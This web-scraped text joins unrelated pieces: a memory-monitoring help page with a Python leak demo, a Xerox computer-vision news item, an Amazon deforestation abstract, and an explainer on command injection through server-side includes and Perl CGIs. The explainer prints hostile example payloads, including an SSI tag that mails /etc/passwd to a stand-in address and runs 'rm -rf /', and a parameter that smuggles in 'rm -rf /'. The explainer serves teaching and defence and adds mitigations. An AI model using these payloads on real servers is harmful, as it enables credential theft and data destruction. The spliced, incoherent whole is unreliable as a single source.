For additional tips on Internet security, feel free to visit http://news.centurylink.com/resources/tips/centurylink-consumer-security-tips-online-security
Using the Anturis Console, you can set up monitoring of free physical memory for any hardware component (a server computer) in your infrastructure by adding the Free Physical Memory monitor to the component.
Physical memory (also known as main memory or primary storage) is the only type of memory directly accessible by the CPU. It is used to store data that is actively being processed, as well as instructions that the CPU reads and executes. Data can be stored and retrieved in any order, which is why physical memory is often referred to as random-access memory (RAM), although auxiliary memory (optical discs, magnetic disk drives, flash memory, and other secondary storage devices) is also accessed in a random-access manner.
It is also very important for the CPU to access data in physical memory in the shortest time possible, regardless of its location on the medium. RAM used for primary storage is fast but volatile, meaning that data is stored only while there is power and is cleared on restart.
Running out of free physical memory is one of the reasons for server performance degradation. Some systems use secondary storage as virtual memory, moving the least-used data from the physical memory and retrieving it back when it is required. Besides the fact that secondary storage is much slower, such swapping leads to file system fragmentation, which contributes to an even greater decrease in server performance.
When there is little RAM left, you may want to consider optimizing the way physical memory is used by the OS and other software. If you are not able to reduce the amount of used physical memory, then you should add more RAM to the server.
A memory leak is a common problem for server software. It usually happens due to poor design, when an application does not properly discard unused objects from the main memory. The amount of memory constantly increases until there is no memory left for new objects, and the application crashes. A RAM monitor can help identify a memory leak early so that you can react to the problem before a crash occurs.
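A leak of this kind shows up as allocation totals that only ever grow. As a minimal, self-contained illustration (using Python's standard-library tracemalloc, not Anturis's monitor; the handler and cache names are invented), the sketch below compares two heap snapshots around a handler that stores every payload forever:

```python
import tracemalloc

leaky_cache = []  # objects that are never discarded -- the "leak"

def handle_request(i):
    # A poorly designed handler: it keeps a reference to every payload.
    leaky_cache.append(("payload-%d" % i) * 100)

tracemalloc.start()
before = tracemalloc.take_snapshot()

for i in range(10_000):
    handle_request(i)

after = tracemalloc.take_snapshot()

# The largest difference points straight at the leaking line.
top = after.compare_to(before, "lineno")[0]
print(top)                              # file, line, and size growth
print("grew by", top.size_diff, "bytes")
```

In a real server you would take such snapshots periodically; a statistic whose size keeps climbing between snapshots is the signature of a leak.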
©2017 Anturis Inc. All Rights Reserved.
From camera systems to detecting drivers on the phone
Xerox is planning to showcase a research breakthrough which will make computers behave like humans.
Among the technologies to be showcased are mobile technology that turns a smartphone into a driving coach, imaging technology that can detect drivers who text, and technology to make images more eye-catching.
Raja Bala, Xerox principal scientist, said "Xerox has firsthand knowledge of business processes across many industries, and is a pioneer in teaching computers to extract meaningful and actionable analytics from images and video."
"Although there’s been significant progress in recent years, a number of scientific challenges remain to be resolved," Bala added.
Scientists from the company are working on a camera system for highways that uses pattern recognition technology to detect whether the driver is using a cell phone while driving.
Researchers at its Xerox Research Center Webster (XRCW) are developing a computer vision system which will make smartphones into driving assistants.
The system uses facial feature detection technology in the phone to estimate a driver’s gaze direction and detect whether the driver is distracted and not paying attention to the road.
Researchers from both Xerox in Europe and Harvard University are studying eye-catching elements in images, which will help make visuals more attractive as well as predict where people will look in a photo or game.
The Xerox Research Centre Europe (XRCE) has invented a method which can automatically analyse an image and create a unique ‘visual signature’ that distinguishes it from other images.
The system is claimed to create visual signatures in a more compact and robust fashion than current deep learning methods.
The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) will run from 23-28 June in Columbus, US.
Raja Bala, Xerox principal scientist, demonstrates a camera system for highways that uses pattern recognition technology to detect if a driver is using a cell phone. Image Courtesy: Xerox
Nunes S.S. (Lancaster University and the Amazon Institute of People and the Environment, Imazon), Barlow J. (Lancaster University), Gardner T.A. (Stockholm Environment Institute), and 4 more authors. Environmental Conservation, 2015.
Summary: Brazilian environmental law imposes more restrictions on land-use change by private landowners in riparian forests than in non-riparian forest areas, reflecting recognition of their importance for the conservation of biodiversity and key ecosystem services. A 22-year time series of classified Landsat images was used to evaluate deforestation and forest regeneration in riparian permanent preservation areas over the past two decades, focusing on the municipality of Paragominas in the state of Pará in eastern Amazonia. There was no evidence that riparian forests had been more effectively protected than non-riparian forests. Instead, deforestation was found to be comparatively higher inside riparian permanent preservation areas as recently as 2010, indicating a widespread failure of private property owners to comply with environmental legislation. There was no evidence for higher levels of regeneration in riparian zones, although property owners are obliged by law to restore such areas. A number of factors limit improvements in the protection and restoration of riparian forests. These include limited awareness of environmental compliance requirements, the need for improved technical capacity in mapping the distribution and extent of riparian forests and the boundaries of private properties, and improved access to the financial resources and technical capacity needed to support restoration projects. Copyright © Foundation for Environmental Conservation 2014.
Stealth commanding is a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server. Stealth commanding is primarily used in the execution of operating system commands, allowing complete takeover of the server.
Stealth commanding enables attackers to execute arbitrary system-level commands. Likely targets are server-side includes, parsed scripts, CGIs (such as Perl), code that appears to take input and turn it into OS commands, and anything that takes parameters and turns them into parsed protocols.
Most script languages used for CGIs simply chain strings together when receiving parameters. On many occasions these scripts rely on OS commands and are therefore relatively easy to exploit. The most common type of script is the Perl CGI.
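The string-chaining problem is not specific to Perl. This Python sketch (an illustration of the flaw, not an exploit for any particular CGI) shows why chaining a parameter into one command string invites injection, and how passing an argument vector or quoting the untrusted part avoids it:

```python
import shlex

user_input = "README.txt; rm -rf /"   # attacker-controlled parameter

# VULNERABLE: parameters chained into one string and handed to a shell.
# The ';' ends the intended command and starts the attacker's own.
unsafe = "ls -l " + user_input
print(unsafe)   # ls -l README.txt; rm -rf /

# SAFER: pass an argument vector (e.g. to subprocess.run); no shell
# parses the input, so ';' is just part of a (nonexistent) file name.
safe_argv = ["ls", "-l", user_input]

# If a shell string is unavoidable, quote the untrusted part.
quoted = "ls -l " + shlex.quote(user_input)
print(quoted)   # ls -l 'README.txt; rm -rf /'
```

The same principle applies in Perl (list-form system() rather than a single interpolated string) and in any language that ultimately hands user input to a shell.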
Server-side includes are an old technology, used in the past to provide minimal server-side scripting capabilities (commonly appearing in .SHTML files). Server-side includes are still supported by many Web servers. Following is a server-side include example, which builds the header and footer sections of a Web page:
<!--#include file="header.html" -->
<!--#include file="footer.html" -->
Include files are part of the HTML code that describes a page. If combined with user supplied dynamic data, include files can be malicious. An attacker can inject dangerous server-side include tags, which will later on be parsed by the server-side includes parser. For example, consider the following input for a bulletin board message:
Hi Kevin, I love the guestbook!
<!--#exec cmd="mail -s 'Ha Ha' email@example.com </etc/passwd; rm -rf /"-->
If the user's message is written to an HTML file that is subsequently parsed for server-side includes, the command will be executed each time the page is loaded: an email containing the "passwd" file will be sent to the attacker, and the server's file system will be erased.
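One standard defense is to strip or neutralize SSI directives from user-supplied text before it is written into any file the server will parse. A minimal Python sketch follows; the regular expression is my own illustration of the directive syntax, and in practice HTML-escaping all user input is the more robust approach than blocklisting:

```python
import re

# Matches SSI directives such as <!--#exec cmd="..." --> or <!--#include ... -->.
SSI_DIRECTIVE = re.compile(r"<!--\s*#.*?-->", re.DOTALL)

def strip_ssi(text: str) -> str:
    """Remove server-side include directives from untrusted input."""
    return SSI_DIRECTIVE.sub("", text)

message = ("Hi Kevin, I love the guestbook!\n"
           "<!--#exec cmd=\"mail -s 'Ha Ha' email@example.com </etc/passwd; rm -rf /\"-->")

print(strip_ssi(message))   # only the harmless first line survives
```

Disabling the `exec` feature of server-side includes at the web-server level (where the server supports that option) is a complementary mitigation.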